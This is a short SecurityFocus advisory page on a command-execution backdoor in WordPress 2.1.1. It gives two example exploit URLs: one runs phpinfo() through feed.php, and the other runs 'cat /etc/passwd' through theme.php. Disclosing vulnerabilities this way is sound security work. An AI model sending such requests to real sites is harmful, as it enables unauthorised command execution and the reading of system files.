info
discussion
exploit
solution
references
Wordpress 2.1.1 Command Execution Backdoor Vulnerability
The following examples were provided:
http://www.example.com/wp-includes/feed.php?ix=phpinfo();
http://www.example.com/wp-includes/theme.php?iz=cat /etc/passwd
Privacy Statement
Copyright 2010, SecurityFocus
